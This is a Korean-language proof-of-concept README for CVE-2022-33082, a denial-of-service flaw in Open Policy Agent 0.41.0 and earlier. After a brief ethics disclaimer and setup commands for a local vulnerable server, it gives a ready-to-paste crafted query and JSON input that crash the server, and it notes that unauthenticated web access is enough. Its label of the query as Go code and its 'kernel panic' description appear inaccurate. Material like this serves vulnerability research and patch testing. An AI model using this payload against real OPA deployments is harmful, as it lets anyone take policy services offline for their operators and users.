CVE 2022-33082 익스플로잇
면책 고지
이 코드는 윤리적 목적으로 제공됩니다. 즉, 취약점을 이해하고 자신의 시스템 또는 인증된 시스템을 테스트하기 위함입니다. 이 코드를 사용함으로써 귀하는 윤리적으로 행동할 것에 동의하며, 귀하가 윤리적으로 행동하지 않을 경우 저는 어떠한 책임도 지지 않습니다.
이 익스플로잇은 Open Policy Agent (OPA) 버전 0.41.0 이하에서 작동합니다. Linux에 OPA 인스턴스를 설치하여 테스트하려면 다음 명령어를 사용하세요:
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
그런 다음 웹 브라우저에서 localhost:8181로 이동합니다. 아래 내용을 각 필드에 입력하세요.
쿼리 필드 (Go 코드):
p := [input() | input := 1]
{ "input":"put this in the input (json) field!" }
그러면 웹사이트가 충돌하고 서버를 실행 중인 터미널에 커널 패닉이 보고됩니다.
영향
OPA 서버 버전 0.41.0 이하에 웹 접근 권한이 있는 사람은 누구나 서버를 완전히 충돌시킬 수 있습니다. 이 서버는 기본적으로 비밀번호로 보호되지 않습니다.